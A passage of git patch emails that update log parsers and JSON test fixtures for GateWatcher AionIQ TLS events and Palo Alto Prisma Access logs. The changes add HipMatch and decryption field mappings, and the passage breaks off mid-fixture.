Subject: [PATCH 076/150] test(GateWatcher): Improve support of tls events --- GateWatcher/aioniq/ingest/parser.yml | 1 + GateWatcher/aioniq/tests/sigflow-tls.json | 68 +++++++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 GateWatcher/aioniq/tests/sigflow-tls.json diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 3cc13d747..869a7f8f3 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -215,3 +215,4 @@ stages: gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" tls.version: "{{json_load.message.tls.version}}" tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json @@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file From bd97efb6cdc757fa14e48c692ee1cdcfdc568f23 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:33:23 +0100 Subject: [PATCH 077/150] fix(GateWatcher): lint parser --- GateWatcher/aioniq/ingest/parser.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 869a7f8f3..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -206,13 +206,13 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" - tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" From e80062d46eef52b2721efe3f4b17c0a01dace43b Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:45:07 +0100 Subject: [PATCH 078/150] chore(PAloaAlto): name some columns --- .../paloalto-prisma-access/ingest/parser.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 113ef7fdb..7c7de00b8 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID @@ -235,12 +235,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 838a83c453d43ea013f72192a71ffd3350af2fba Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:46:41 +0100 Subject: [PATCH 079/150] fix(PaloAlto): fix the definition of the user properties --- .../paloalto-prisma-access/ingest/parser.yml | 4 ++-- .../paloalto-prisma-access/tests/decryption_cef.json | 5 +++-- .../paloalto-prisma-access/tests/fix_bug_with_int.json | 5 +++-- .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 5 +++-- .../paloalto-prisma-access/tests/test_globalprotect.json | 7 ++++--- .../paloalto-prisma-access/tests/test_userid.json | 6 +++--- 6 files changed, 18 insertions(+), 14 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 7c7de00b8..84514974e 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -798,8 +798,8 @@ stages: set_finalize_user_name: actions: - set: - user.domain: '{{final.user.name.split("\\") | first}}' - user.name: '{{final.user.name.split("\\") | last}}' + user.domain: '{{final.user.name.split("\\") | last}}' + user.name: '{{final.user.name.split("\\") | first}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: user.domain: '{{final.user.email.split("@") | first}}' diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json index 1a4fba4b4..b32ea4d13 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json @@ -69,6 +69,7 @@ "1.1.1.1" ], "user": [ + "paloaltonetwork", "xxxxx" ] }, @@ -90,8 +91,8 @@ } }, "user": { - "domain": "paloaltonetwork", - "name": "xxxxx" + "domain": "xxxxx", + "name": "paloaltonetwork" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json index 512ae89e7..37c8000b9 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json @@ -62,6 +62,7 @@ "5.6.7.8" ], "user": [ + "domain", "pusername", "userdest" ] @@ -86,8 +87,8 @@ } }, "user": { - "domain": "domain", - "name": "pusername" + "domain": "pusername", + "name": "domain" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e4b1d5fab..e0cb016eb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -46,6 +46,7 @@ "88.120.236.74" ], "user": [ + "example.org", "test" ] }, @@ -61,8 +62,8 @@ } }, "user": { - "domain": "example.org", - "name": "test" + "domain": "test", + "name": "example.org" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index f08a677ef..5cc8690a2 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -49,7 +49,8 @@ "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -64,8 +65,8 @@ } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file From 497fb289a176e5b2a21ed5e52b294cc18afd8120 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:47:10 +0100 Subject: [PATCH 080/150] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json new file mode 100644 index 000000000..45f8d34f8 --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } +} \ No newline at end of file From e314c268cf04780877f6b195703ac7f420bfa0b2 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:48:59 +0100 Subject: [PATCH 081/150] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml | 4 ++-- .../paloalto-prisma-access/tests/globalprotect_csv.json | 1 + .../paloalto-prisma-access/tests/globalprotect_csv_2.json | 1 + .../paloalto-prisma-access/tests/test_globalprotect.json | 1 + .../paloalto-prisma-access/tests/test_hipmatch_json.json | 4 ++++ .../paloalto-prisma-access/tests/test_new_globalprotect.json | 1 + 6 files changed, 10 insertions(+), 2 deletions(-) diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 84514974e..07492992b 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -577,7 +577,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" @@ -602,7 +602,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json index e0cb016eb..e51f19fbb 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json index 5cc8690a2..70c31c202 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json index 45f8d34f8..fd4e5a75f 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From fd17ed126f555368791cad8216454c1bb8fd7d33 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:51:21 +0100 Subject: [PATCH 082/150] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-prisma-access/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 07492992b..63f72e8e0 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..140e7657e --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Thu, 21 Nov 2024 17:55:42 +0100 Subject: [PATCH 083/150] fix(PaloAlto): improve support for decryption events --- .../paloalto-prisma-access/_meta/fields.yml | 15 +++ .../paloalto-prisma-access/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 119 ++++++++++++++++++ 3 files changed, 144 insertions(+) create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml index 6382be28b..3b3fd8fc6 100644 --- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml @@ -297,3 +297,18 @@ paloalto.threat.name: description: The name of the threat name: paloalto.threat.name type: keyword + +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml index 63f72e8e0..8da957210 100644 --- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml @@ -636,6 +636,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -809,6 +816,9 @@ stages: paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}" paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}" paloalto.threat.name: "{{parsed_threat.message.threat_description}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: source.user.name: "{{parsed_event.message.SourceUser}}" user.name: "{{parsed_event.message.SourceUser}}" diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json new file mode 100644 index 000000000..35fa4abec --- /dev/null +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json @@ -0,0 +1,119 @@ +{ + "input": { + "message": 